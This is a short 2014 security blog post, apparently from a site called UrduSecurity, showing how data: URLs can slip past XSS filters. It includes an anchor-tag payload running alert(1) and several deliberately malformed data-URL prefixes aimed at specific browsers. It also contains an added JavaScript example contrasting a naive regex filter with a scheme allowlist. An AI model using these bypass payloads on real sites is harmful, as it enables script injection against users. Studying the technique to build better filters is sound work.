Sunday 22 June 2014

Hello Friends,

After a long time I'm writing a blog post, but believe me it's really fun, and I'm going to take you very deep if you really understand what I describe below.

Let's start. Basically, data URLs in their Base64-encoded form can be used for XSS filter bypass, and it gets serious when working with Firefox and Opera, where newly opened documents retain access to the opening page (loading completely). So an attacker can easily trigger XSS on these semi-loaded tags.

<a target=_blank href="data:text/html,");alert(1)//">Click Me</a>

We can even Base64-encode this payload. But Google Chrome will block the attacker's trick, so he has limited options in his pocket.



Fun Starts Now

Now what if a specific XSS filter knows about data URLs and tries to filter/reject the payload? We can still bypass it, of course!

I found an interesting way to bypass it and you might like it.

data:text/html;base64UrduSecurity,[Attack-Payload] - Firefox & Safari
data:text/html:;base64,[Attack-Payload]
data:text/html;base64,,[Attack-Payload] - Opera

And here is the fully designed payload, ready!


This table might help you someday.
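
Seen from the filter's side, as an added example that is not part of the original post: a filter that pattern-matches the well-formed `data:text/html;base64,` prefix lets malformed variants from the list above through, while a scheme allowlist rejects every `data:` link no matter what follows the scheme. The function names and the allowlist contents are assumptions for illustration; `[Attack-Payload]` is the post's own placeholder.

```javascript
// Weak filter: only recognises the well-formed data:text/html prefixes.
function naiveFilterAllows(url) {
  return !/^data:text\/html(;base64)?,/i.test(url);
}

// Assumed allowlist for link targets; adjust to the application.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Hardened filter: normalise the way URL parsers do, then allow only
// relative URLs or an allowlisted scheme. The media type is never inspected,
// so malformed parameters after "data:" make no difference.
function strictFilterAllows(url) {
  const cleaned = String(url)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "") // leading/trailing C0 and space
    .replace(/[\t\n\r]/g, "");                           // tab/newline anywhere
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(cleaned);
  if (!m) return true; // no scheme: relative URL (assumed acceptable here)
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Constructed sample inputs: the variants from the post plus two benign links.
const SAMPLES = [
  "data:text/html,[Attack-Payload]",
  "data:text/html;base64,[Attack-Payload]",
  "data:text/html;base64UrduSecurity,[Attack-Payload]",
  "data:text/html:;base64,[Attack-Payload]",
  "data:text/html;base64,,[Attack-Payload]",
  "https://example.com/page",
  "/local/path",
];

// Run both filters over every sample and return the verdicts side by side.
function compare() {
  return SAMPLES.map((url) => ({
    url,
    naive: naiveFilterAllows(url),
    strict: strictFilterAllows(url),
  }));
}

for (const row of compare()) {
  console.log(`${row.naive ? "ALLOW" : "BLOCK"} / ${row.strict ? "ALLOW" : "BLOCK"}  ${row.url}`);
}
```

Each output line shows the naive verdict first and the allowlist verdict second.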


Hope you guys will like this tutorial. Leave your feedback; in case of any queries, let me know.

Playing with DATA URL Tags in HTML

  • Uploaded by: Adeel Chaudhary




    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity